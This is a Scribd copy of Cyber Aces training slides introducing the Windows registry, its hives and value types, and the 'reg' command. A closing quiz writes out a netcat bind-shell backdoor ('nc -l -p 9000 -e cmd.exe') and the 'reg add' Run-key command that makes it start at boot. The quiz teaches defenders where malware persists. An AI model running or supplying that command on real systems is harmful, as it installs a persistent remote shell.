Scribd
Upload
99 views13 pages

CyberAces Module1-Windows 7 Registry

This document provides an introduction to the Windows registry tutorial. It discusses the Windows registry and its structure. Key points include: - The registry stores configuration data for applications and the operating system. It is broken into sections called "hives" that contain different classes of data. - The HKLM and HKCU hives are most relevant for attackers and defenders. HKLM contains settings that affect all users, while HKCU is for the current user. - Common registry value types include REG_BINARY, REG_DWORD, REG_QWORD, and more. - The tutorial demonstrates how to use the REG command to view registry keys and values, including the key that stores programs to run

Uploaded by

Abiodun Amusat
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
99 views13 pages

CyberAces Module1-Windows 7 Registry

This document provides an introduction to the Windows registry tutorial. It discusses the Windows registry and its structure. Key points include: - The registry stores configuration data for applications and the operating system. It is broken into sections called "hives" that contain different classes of data. - The HKLM and HKCU hives are most relevant for attackers and defenders. HKLM contains settings that affect all users, while HKCU is for the current user. - Common registry value types include REG_BINARY, REG_DWORD, REG_QWORD, and more. - The tutorial demonstrates how to use the REG command to view registry keys and values, including the key that stores programs to run

Uploaded by

Abiodun Amusat
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 13

Welcome to Cyber Aces Online, Module 1!

In this session we will examine the


Windows registry.
This training material was originally developed to help students, teachers, and
mentors prepare for the Cyber Aces Online Competition. This module focuses on the
basics of what an operating systems is as well as the two predominant OS's, Windows
and Linux. This session is part of Module 1, Introduction to Operating Systems. This
module is split into two sections, Linux and Windows. In this session, we will continue
our examination of Windows.
The three modules of Cyber Aces Online are Operating Systems, Networking, and
System Administration.
For more information about the Cyber Aces program, please visit the Cyber Aces
website at https://CyberAces.org/.

2
In this session we will discuss the Windows registry.
The Windows registry is used to store configuration data for applications and the
operating system. It is broken down into sections containing different classes of data.
Registry keys are of interest to computer attackers because they may contain sensitive
information such as usernames and passwords, and because they can be used to alter
the way applications and the operating system behave. It is very common for attackers
to create registry keys so that their malicious software starts automatically when the
computer boots.

4
The registry is broken down into "Hives" that contain different classes of data. The
two hives that attackers and defenders find themselves in most often are the HKLM
and HKCU hives. The HKLM or HKEY_Local_Machine hive contains settings for the
Operating System that affect everyone on the computer. HKCU or HKEY_Current_User
is a shortcut to a subdirectory in the HKEY_Users hive for the user that is currently
logged into the machine. Familiarize yourself with the registry and some key
components.

5
Common Registry Value Types
Registry Data Types:
REG_BINARY - Binary data.
REG_DWORD - 32-bit integer representing 4.2 million possibilities.
REG_QWORD - 64-bit number representing 18 quintillion (18 * 10^18) possibilities.
REG_DWORD_LITTLE_ENDIAN - 32-bit number in little-endian format; equivalent to
REG_DWORD. The little-endian format is where a multibyte value is stored from the
lowest byte (the "little end") to the highest byte. For example, the value 0x12345678
is stored as (0x78 0x56 0x34 0x12) in little-endian format.
REG_QWORD_LITTLE_ENDIAN - A 64-bit number in little-endian format; equivalent to
REG_QWORD.
REG_DWORD_BIG_ENDIAN - 32-bit number in big-endian format (big end is stored
first).
REG_EXPAND_SZ - Null-terminated (last character is ASCII 00) string that contains
unexpanded references to environment variables (for example, "%PATH%"). It will be
a Unicode or ANSI string, depending on whether you use the Unicode or ANSI
functions.
REG_LINK - Unicode symbolic link.
REG_MULTI_SZ - Array of null-terminated strings that are terminated by two null
characters. Where a "null" is a byte with a value of 00.
REG_NONE - No defined value type.
Be careful, if you mess up the registry you can seriously damage your Windows
install. Please only do this in the VM we have built, not in your host operating system.
We'll start off by looking at the general help page and the help page on querying.
View help on the "reg" command.
C:\> reg /?
View help on the "reg query" command.
C:\> reg query /?
Look at the keys in HKCU (current user)
C:\> reg query hkcu
Look at the items in the Curent User’s Software Key
C:\> reg query hkcu\software
Using this process, you can step through and view everything (you have permissions
to access) in your registry.
To query all the values in the most common modified registry key by malware you
would type:
C:\> reg query
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /s
Suppose that an administrator suspecting that his machine may have been
compromised used the REG command to look at these keys and sees information
above.

10
What is the name of the registry key that is starting the NETCAT backdoor on his
computer?
• GrooveMonitor
• Adobe ARM
• EvilStarter
• RUN
What is the correct syntax for an attacker to create this key with the REG command?
• reg add
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Evi
lStarter" Value= "nc -l -p 9000 -e cmd.exe "
• reg add
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Evi
lStarter" /d "nc -l -p 9000 -e cmd.exe"
• reg add
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v
"EvilStarter" /d "nc -l -p 9000 -e cmd.exe "
• reg create
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v
"EvilStarter" /d "nc -l -p 9000 -e cmd.exe "

11
What is the name of the registry key that is starting the NETCAT backdoor on his
computer?
EvilStarter
The command called is nc -l -p 9000 -e cmd.exe
What is the correct syntax for an attacker to create this key with the REG command?
reg add
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
/v "EvilStarter" /d "nc -l -p 9000 -e cmd.exe"
To see help on the syntax of this command run "reg /?"

12
Congratulations, you have completed the tutorial on the Windows Registry

13
In the next session, we will discuss Windows networking.

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy